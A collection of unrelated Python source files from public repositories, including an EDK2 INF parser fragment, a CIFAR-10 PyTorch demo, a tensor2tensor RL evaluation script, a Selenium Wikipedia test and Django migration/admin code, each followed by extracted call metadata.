Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
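# A minimal illustration (hypothetical values) of how the helper is meant to be
# called; LineInfo is [file name, line number, offending line content]:
#   ErrorInInf(Message='Unknown section name',
#              ErrorCode=ToolError.FORMAT_INVALID,
#              LineInfo=['Module.inf', 10, '[BadSection]'],
#              RaiseError=True)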
| [((136, 4, 142, 39), 'Logger.Log.Error', 'Logger.Error', (), '', True, 'import Logger.Log as Logger\n'), ((103, 31, 103, 38), 'Library.Misc.Sdict', 'Sdict', ({}, {}), '()', False, 'from Library.Misc import Sdict\n'), ((104, 8, 104, 42), 'Object.Parser.InfCommonObject.InfSectionCommonDef.__init__', 'InfSectionCommonDef.__init__', ({(104, 37, 104, 41): 'self'}, {}), '(self)', False, 'from Object.Parser.InfCommonObject import InfSectionCommonDef\n')] |
allenalvin333/Codechef_Competitions | 21-08/Starters8/1.py | 44c3626de33cd9e17d1acfc74abe0aab809efbad | # https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0) | [] |
jhong93/vpd | util/eval.py | 1ed3e8631c46e078ecb9a7756dba1f1c14aead5b | import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
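# Illustrative call (hypothetical labels and output path): write a row-normalized
# confusion matrix, displayed as percentages, to disk.
#   save_confusion_matrix(['cat', 'dog', 'dog'], ['cat', 'cat', 'dog'],
#                         'confusion_matrix.png', norm='true')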
| [((15, 10, 15, 38), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 11, 18, 56), 'sklearn.metrics.ConfusionMatrixDisplay', 'ConfusionMatrixDisplay', (), '', False, 'from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\n'), ((21, 4, 21, 22), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((22, 4, 22, 25), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(22, 16, 22, 24): 'out_file'}, {}), '(out_file)', True, 'import matplotlib.pyplot as plt\n'), ((23, 4, 23, 18), 'matplotlib.pyplot.close', 'plt.close', ({(23, 14, 23, 17): 'fig'}, {}), '(fig)', True, 'import matplotlib.pyplot as plt\n')] |
sillyemperor/langstudy | python/py3study/pytorch-lab/demo-cifar.py | 937a11d97984e10e4ead54f3b7b7d6a1f2ef24a1 | import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 10])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
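# A minimal manual evaluation sketch (illustrative, not part of the original
# demo): computes top-1 test accuracy for the trained `model` above without
# relying on util.train_eval.
def manual_eval(model, loader):
    model.eval()
    correct = total = 0
    with torch.no_grad():
        for images, labels in loader:
            outputs = model(images)
            _, predicted = torch.max(outputs, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    return 100.0 * correct / total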
| [((12, 11, 13, 75), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', (), '', False, 'import torchvision\n'), ((14, 14, 15, 70), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (), '', False, 'import torch\n'), ((17, 10, 18, 74), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', (), '', False, 'import torchvision\n'), ((19, 13, 20, 70), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (), '', False, 'import torch\n'), ((63, 12, 63, 33), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', True, 'import torch.nn as nn\n'), ((69, 0, 69, 74), 'util.train_eval', 'train_eval', (), '', False, 'from util import train_eval\n'), ((8, 5, 8, 26), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', True, 'import torchvision.transforms as transforms\n'), ((9, 5, 9, 59), 'torchvision.transforms.Normalize', 'transforms.Normalize', ({(9, 26, 9, 41): '(0.5, 0.5, 0.5)', (9, 43, 9, 58): '(0.5, 0.5, 0.5)'}, {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))', True, 'import torchvision.transforms as transforms\n'), ((29, 21, 29, 39), 'torch.nn.Conv2d', 'nn.Conv2d', ({(29, 31, 29, 32): '3', (29, 34, 29, 35): '6', (29, 37, 29, 38): '5'}, {}), '(3, 6, 5)', True, 'import torch.nn as nn\n'), ((30, 20, 30, 38), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', ({(30, 33, 30, 34): '2', (30, 36, 30, 37): '2'}, {}), '(2, 2)', True, 'import torch.nn as nn\n'), ((31, 21, 31, 40), 'torch.nn.Conv2d', 'nn.Conv2d', ({(31, 31, 31, 32): '6', (31, 34, 31, 36): '16', (31, 38, 31, 39): '5'}, {}), '(6, 16, 5)', True, 'import torch.nn as nn\n'), ((32, 19, 32, 45), 'torch.nn.Linear', 'nn.Linear', ({(32, 29, 32, 39): '16 * 5 * 5', (32, 41, 32, 44): '120'}, {}), '(16 * 5 * 5, 120)', True, 'import torch.nn as nn\n'), ((33, 19, 33, 37), 'torch.nn.Linear', 'nn.Linear', ({(33, 29, 33, 32): '120', (33, 34, 33, 36): '84'}, {}), '(120, 84)', True, 'import torch.nn as nn\n'), ((34, 19, 34, 36), 'torch.nn.Linear', 'nn.Linear', ({(34, 29, 34, 31): '84', (34, 33, 34, 35): '10'}, {}), '(84, 10)', True, 'import torch.nn as nn\n')] |
B612-Asteroid-Institute/astroquery | astroquery/neodys/tests/test_neodys_remote.py | 4bc8002639e80f7356306f4e000334da5e086091 |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| [] |
kkrampa/commcare-hq | corehq/apps/accounting/migrations/0026_auto_20180508_1956.py | d64d7cad98b240325ad669ccc7effb07721b4d44 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-08 19:56
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import migrations
def noop(*args, **kwargs):
pass
def _convert_emailed_to_array_field(apps, schema_editor):
BillingRecord = apps.get_model('accounting', 'BillingRecord')
for record in BillingRecord.objects.all():
if record.emailed_to != '':
record.emailed_to_list = record.emailed_to.split(',')
record.save()
WireBillingRecord = apps.get_model('accounting', 'WireBillingRecord')
for wirerecord in WireBillingRecord.objects.all():
if wirerecord.emailed_to != '':
wirerecord.emailed_to_list = wirerecord.emailed_to.split(',')
wirerecord.save()
class Migration(migrations.Migration):
dependencies = [
('accounting', '0025_auto_20180508_1952'),
]
operations = [
migrations.RunPython(_convert_emailed_to_array_field, reverse_code=noop)
]
| [((35, 8, 35, 80), 'django.db.migrations.RunPython', 'migrations.RunPython', (), '', False, 'from django.db import migrations\n')] |
SouBanerjee/tensor2tensor | tensor2tensor/rl/evaluator.py | 8b88b13dd65bf52b3c27663a128adb7b0a5773fb | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
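# Worked example for get_game_for_worker (illustrative): with the "v100unfriendly"
# map the sorted games are ["asterix", "boxing", "chopper_command", "seaquest"] and
# worker_per_game is 5, so directory ids 1-5 map to "asterix", ids 6-10 to
# "boxing", and so on.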
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [((87, 9, 93, 3), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', (), '', True, 'import tensorflow as tf\n'), ((98, 9, 104, 3), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', (), '', True, 'import tensorflow as tf\n'), ((188, 24, 188, 63), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', ({(188, 46, 188, 62): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((199, 17, 201, 3), 'tensor2tensor.rl.rl_utils.evaluate_all_configs', 'rl_utils.evaluate_all_configs', ({(200, 6, 200, 18): 'loop_hparams', (200, 20, 200, 30): 'policy_dir'}, {}), '(loop_hparams, policy_dir, **kwargs)', False, 'from tensor2tensor.rl import rl_utils\n'), ((202, 2, 202, 66), 'tensor2tensor.rl.rl_utils.summarize_metrics', 'rl_utils.summarize_metrics', ({(202, 29, 202, 48): 'eval_metrics_writer', (202, 50, 202, 62): 'eval_metrics', (202, 64, 202, 65): '(0)'}, {}), '(eval_metrics_writer, eval_metrics, 0)', False, 'from tensor2tensor.rl import rl_utils\n'), ((233, 2, 233, 64), 'tensorflow.logging.info', 'tf.logging.info', ({(233, 18, 233, 63): "('Getting game %d from %s.' % (game_id, games))"}, {}), "('Getting game %d from %s.' % (game_id, games))", True, 'import tensorflow as tf\n'), ((238, 8, 238, 31), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((240, 17, 242, 3), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', ({(241, 6, 241, 28): 'FLAGS.loop_hparams_set', (241, 30, 241, 48): 'FLAGS.loop_hparams'}, {}), '(FLAGS.loop_hparams_set, FLAGS.loop_hparams)', False, 'from tensor2tensor.utils import trainer_lib\n'), ((249, 20, 251, 3), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', ({(250, 6, 250, 31): 'FLAGS.planner_hparams_set', (250, 33, 250, 54): 'FLAGS.planner_hparams'}, {}), '(FLAGS.planner_hparams_set, FLAGS.planner_hparams)', False, 'from tensor2tensor.utils import trainer_lib\n'), ((274, 2, 274, 43), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', ({(274, 27, 274, 42): 'tf.logging.INFO'}, {}), '(tf.logging.INFO)', True, 'import tensorflow as tf\n'), ((275, 2, 275, 14), 'tensorflow.app.run', 'tf.app.run', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((156, 10, 156, 72), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', ({(156, 37, 156, 40): 'env', (156, 42, 156, 71): 'loop_hparams.frame_stack_size'}, {}), '(env, loop_hparams.frame_stack_size)', False, 'from tensor2tensor.rl import rl_utils\n'), ((157, 21, 160, 5), 'tensor2tensor.models.research.rl.make_simulated_env_kwargs', 'rl.make_simulated_env_kwargs', (), '', False, 'from tensor2tensor.models.research import rl\n'), ((246, 4, 246, 58), 'tensorflow.logging.info', 'tf.logging.info', ({(246, 20, 246, 57): "('Set game to %s.' % loop_hparams.game)"}, {}), "('Set game to %s.' 
% loop_hparams.game)", True, 'import tensorflow as tf\n'), ((259, 17, 259, 48), 'os.path.join', 'os.path.join', ({(259, 30, 259, 37): 'cur_dir', (259, 39, 259, 47): '"""policy"""'}, {}), "(cur_dir, 'policy')", False, 'import os\n'), ((260, 16, 260, 52), 'os.path.join', 'os.path.join', ({(260, 29, 260, 36): 'cur_dir', (260, 38, 260, 51): '"""world_model"""'}, {}), "(cur_dir, 'world_model')", False, 'import os\n'), ((261, 23, 261, 68), 'os.path.join', 'os.path.join', ({(261, 36, 261, 43): 'cur_dir', (261, 45, 261, 67): "'evaluator_' + now_tag"}, {}), "(cur_dir, 'evaluator_' + now_tag)", False, 'import os\n'), ((262, 4, 262, 64), 'tensorflow.logging.info', 'tf.logging.info', ({(262, 20, 262, 63): "('Writing metrics to %s.' % eval_metrics_dir)"}, {}), "('Writing metrics to %s.' % eval_metrics_dir)", True, 'import tensorflow as tf\n'), ((193, 21, 194, 66), 'tensor2tensor.layers.common_video.WholeVideoWriter', 'common_video.WholeVideoWriter', (), '', False, 'from tensor2tensor.layers import common_video\n'), ((210, 20, 214, 7), 'tensor2tensor.rl.rl_utils.get_metric_name', 'rl_utils.get_metric_name', (), '', False, 'from tensor2tensor.rl import rl_utils\n'), ((258, 16, 258, 67), 'os.path.join', 'os.path.join', ({(258, 29, 258, 36): 'cur_dir', (258, 38, 258, 66): "'%d' % (FLAGS.worker_id + 1)"}, {}), "(cur_dir, '%d' % (FLAGS.worker_id + 1))", False, 'import os\n'), ((263, 11, 263, 44), 'tensorflow.gfile.Exists', 'tf.gfile.Exists', ({(263, 27, 263, 43): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((264, 6, 264, 38), 'tensorflow.gfile.MkDir', 'tf.gfile.MkDir', ({(264, 21, 264, 37): 'eval_metrics_dir'}, {}), '(eval_metrics_dir)', True, 'import tensorflow as tf\n'), ((114, 27, 116, 7), 'tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', 'rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', ({}, {}), '(**sim_env_kwargs)', False, 'from tensor2tensor.rl import rl_utils\n'), ((129, 24, 131, 7), 'tensor2tensor.rl.rl_utils.RandomAgent', 'rl_utils.RandomAgent', ({(130, 10, 130, 20): 'batch_size', (130, 22, 130, 43): 'env.observation_space', (130, 45, 130, 61): 'env.action_space'}, {}), '(batch_size, env.observation_space, env.action_space)', False, 'from tensor2tensor.rl import rl_utils\n'), ((132, 24, 135, 7), 'tensor2tensor.rl.rl_utils.PolicyAgent', 'rl_utils.PolicyAgent', ({(133, 10, 133, 20): 'batch_size', (133, 22, 133, 43): 'env.observation_space', (133, 45, 133, 61): 'env.action_space', (134, 10, 134, 24): 'policy_hparams', (134, 26, 134, 36): 'policy_dir', (134, 38, 134, 51): 'sampling_temp'}, {}), '(batch_size, env.observation_space, env.action_space,\n policy_hparams, policy_dir, sampling_temp)', False, 'from tensor2tensor.rl import rl_utils\n'), ((141, 22, 141, 71), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', ({(141, 49, 141, 52): 'env', (141, 54, 141, 70): 'frame_stack_size'}, {}), '(env, frame_stack_size)', False, 'from tensor2tensor.rl import rl_utils\n')] |
AndreiHustiuc/IT_Factory_Course | src/part_2_automation/test_test1.py | c6f3e4a9282a1c19c0f52c79f0c81f026814a02a | # Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestTest1():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_test1(self):
self.driver.get("https://www.wikipedia.org/")
self.driver.set_window_size(1920, 1040)
self.driver.find_element(By.ID, "searchInput").click()
self.driver.find_element(By.ID, "searchInput").send_keys("Romania")
self.driver.find_element(By.ID, "searchInput").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".tocsection-21 .toctext").click()
self.driver.execute_script("window.scrollTo(0,10634)")
self.driver.find_element(By.CSS_SELECTOR, ".thumb:nth-child(30) .thumbimage").click()
self.driver.execute_script("window.scrollTo(0,0)")
| [((15, 18, 15, 36), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ({}, {}), '()', False, 'from selenium import webdriver\n')] |
njmhendrix/grand-challenge.org | app/grandchallenge/components/admin.py | 9bc36f5e26561a78bd405e8ea5e4c0f86c95f011 | from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
